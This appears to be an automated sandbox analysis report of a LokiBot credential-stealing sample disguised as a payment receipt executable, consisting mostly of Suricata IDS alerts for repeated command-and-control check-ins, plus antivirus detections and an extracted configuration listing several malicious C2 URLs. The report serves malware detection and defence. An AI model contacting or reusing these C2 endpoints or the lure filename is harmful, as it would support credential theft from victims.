2025-03-05T15:19:18.432234+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65136	104.21.64.1	80	TCP
2025-03-05T15:19:19.357013+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65137	104.21.64.1	80	TCP
2025-03-05T15:19:20.494450+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65138	104.21.64.1	80	TCP
2025-03-05T15:19:21.406340+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65139	104.21.64.1	80	TCP
2025-03-05T15:19:22.296931+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65140	104.21.64.1	80	TCP
2025-03-05T15:19:23.243325+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65141	104.21.64.1	80	TCP
2025-03-05T15:19:24.153722+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65142	104.21.64.1	80	TCP
2025-03-05T15:19:25.033572+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65143	104.21.64.1	80	TCP
2025-03-05T15:19:25.854341+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65144	104.21.64.1	80	TCP
2025-03-05T15:19:26.739485+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65146	104.21.64.1	80	TCP
2025-03-05T15:19:27.620806+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65147	104.21.64.1	80	TCP
2025-03-05T15:19:28.413430+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65148	104.21.64.1	80	TCP
2025-03-05T15:19:29.357401+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65149	104.21.64.1	80	TCP
2025-03-05T15:19:30.273452+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65150	104.21.64.1	80	TCP
2025-03-05T15:19:31.415543+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65151	104.21.64.1	80	TCP
2025-03-05T15:19:32.328120+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65152	104.21.64.1	80	TCP
2025-03-05T15:19:33.258249+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65153	104.21.64.1	80	TCP
2025-03-05T15:19:34.315136+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65154	104.21.64.1	80	TCP
2025-03-05T15:19:35.182237+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65155	104.21.64.1	80	TCP
2025-03-05T15:19:36.128276+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65156	104.21.64.1	80	TCP
2025-03-05T15:19:37.362091+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65157	104.21.64.1	80	TCP
2025-03-05T15:19:38.289552+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65158	104.21.64.1	80	TCP
2025-03-05T15:19:39.229840+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65159	104.21.64.1	80	TCP
2025-03-05T15:19:40.649571+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65160	104.21.64.1	80	TCP
2025-03-05T15:19:41.600103+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65161	104.21.64.1	80	TCP
2025-03-05T15:19:42.543512+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65162	104.21.64.1	80	TCP
2025-03-05T15:19:43.625562+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65163	104.21.64.1	80	TCP
2025-03-05T15:19:44.544643+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65164	104.21.64.1	80	TCP
2025-03-05T15:19:45.515011+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65165	104.21.64.1	80	TCP
2025-03-05T15:19:46.494953+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65166	104.21.64.1	80	TCP
2025-03-05T15:19:47.447654+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65167	104.21.64.1	80	TCP
2025-03-05T15:19:48.405134+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65168	104.21.64.1	80	TCP
2025-03-05T15:19:49.305755+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65169	104.21.64.1	80	TCP
2025-03-05T15:19:50.455441+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65170	104.21.64.1	80	TCP
2025-03-05T15:19:51.376040+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65172	104.21.64.1	80	TCP
2025-03-05T15:19:52.320862+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65173	104.21.64.1	80	TCP
2025-03-05T15:19:53.657550+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65174	104.21.64.1	80	TCP
2025-03-05T15:19:54.626334+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65175	104.21.64.1	80	TCP
2025-03-05T15:19:55.576929+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65176	104.21.64.1	80	TCP
2025-03-05T15:19:56.606770+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65177	104.21.64.1	80	TCP
2025-03-05T15:19:57.593257+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65178	104.21.64.1	80	TCP
2025-03-05T15:19:58.413260+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65179	104.21.64.1	80	TCP
2025-03-05T15:19:59.411470+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65180	104.21.64.1	80	TCP
2025-03-05T15:20:00.358832+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65181	104.21.64.1	80	TCP
2025-03-05T15:20:01.276615+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65182	104.21.64.1	80	TCP
2025-03-05T15:20:02.872645+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65183	104.21.64.1	80	TCP
2025-03-05T15:20:03.679442+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65184	104.21.64.1	80	TCP
2025-03-05T15:20:04.465396+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65185	104.21.64.1	80	TCP
2025-03-05T15:20:05.388496+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65186	104.21.64.1	80	TCP
2025-03-05T15:20:06.323161+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65187	104.21.64.1	80	TCP
2025-03-05T15:20:07.260302+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65188	104.21.64.1	80	TCP
2025-03-05T15:20:08.182929+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65189	104.21.64.1	80	TCP
2025-03-05T15:20:08.981372+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65190	104.21.64.1	80	TCP
2025-03-05T15:20:09.868718+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65191	104.21.64.1	80	TCP
2025-03-05T15:20:10.856301+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65192	104.21.64.1	80	TCP
2025-03-05T15:20:11.747713+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65193	104.21.64.1	80	TCP
2025-03-05T15:20:12.780744+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65194	104.21.64.1	80	TCP
2025-03-05T15:20:13.589961+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65195	104.21.64.1	80	TCP
2025-03-05T15:20:14.386360+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65196	104.21.64.1	80	TCP
2025-03-05T15:20:15.186189+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65197	104.21.64.1	80	TCP
2025-03-05T15:20:16.090928+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65198	104.21.64.1	80	TCP
2025-03-05T15:20:17.018044+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65199	104.21.64.1	80	TCP
2025-03-05T15:20:17.962682+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65200	104.21.64.1	80	TCP
2025-03-05T15:20:19.009901+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65201	104.21.64.1	80	TCP
2025-03-05T15:20:19.808283+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65202	104.21.64.1	80	TCP
2025-03-05T15:20:20.620992+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65203	104.21.64.1	80	TCP
2025-03-05T15:20:21.557064+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65204	104.21.64.1	80	TCP
2025-03-05T15:20:22.355800+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65206	104.21.64.1	80	TCP
2025-03-05T15:20:23.305471+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65207	104.21.64.1	80	TCP
2025-03-05T15:20:24.247512+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65208	104.21.64.1	80	TCP
2025-03-05T15:20:25.161067+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65209	104.21.64.1	80	TCP
2025-03-05T15:20:26.048586+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65210	104.21.64.1	80	TCP
2025-03-05T15:20:26.977865+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65211	104.21.64.1	80	TCP
2025-03-05T15:20:27.854049+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65212	104.21.64.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://alphastand.win/alien/fre.php	Avira URL Cloud: Label: malware
Source: http://alphastand.trade/alien/fre.php	Avira URL Cloud: Label: malware
Source: http://touxzw.ir/fix/five/fre.php	Avira URL Cloud: Label: malware
Source: http://kbfvzoboss.bid/alien/fre.php	Avira URL Cloud: Label: phishing
Source: http://alphastand.top/alien/fre.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe

Avira: detection malicious, Label: TR/AD.LokiBot.kpens

Found malware configuration

Source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	ReversingLabs: Detection: 55%
Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Virustotal: Detection: 56%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: jnXT.pdb source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, euKeoTytdT.exe.1.dr
Source:	Binary string: jnXT.pdbSHA256HW source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, euKeoTytdT.exe.1.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64823 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64823 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64823 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64910 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64910 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64910 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64922 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64922 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64922 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64822 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64822 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64910 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64910 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64922 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64922 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:64823 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64979 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64979 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64979 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64984 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64984 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64984 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64979 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64984 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64984 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64973 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64973 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64973 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64973 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64973 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64933 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:64922
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65023 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64822 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65023 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65023 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64951 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64951 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64951 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:64984
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:64822 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65023 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65023 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64933 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64951 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64933 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64951 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64944 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65004 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65004 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65004 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65039 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65039 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64979 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64944 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64944 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65004 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65004 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64967 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64933 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64933 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64944 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64916 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64916 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64944 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64916 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65039 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65017 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64916 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65017 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64916 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65039 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65039 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65051 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65051 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65051 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65023
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65051 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65051 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64989 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64989 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64989 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65004
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64989 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64989 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65081 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65081 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65081 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:64910
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65081 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65081 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:64944
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65110 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65110 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65110 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:64973
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65110 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65116 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65116 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65116 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65110 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64998 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65116 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65116 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64998 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64998 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65124 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65031 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65031 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65031 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65129 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64998 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64998 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:64989
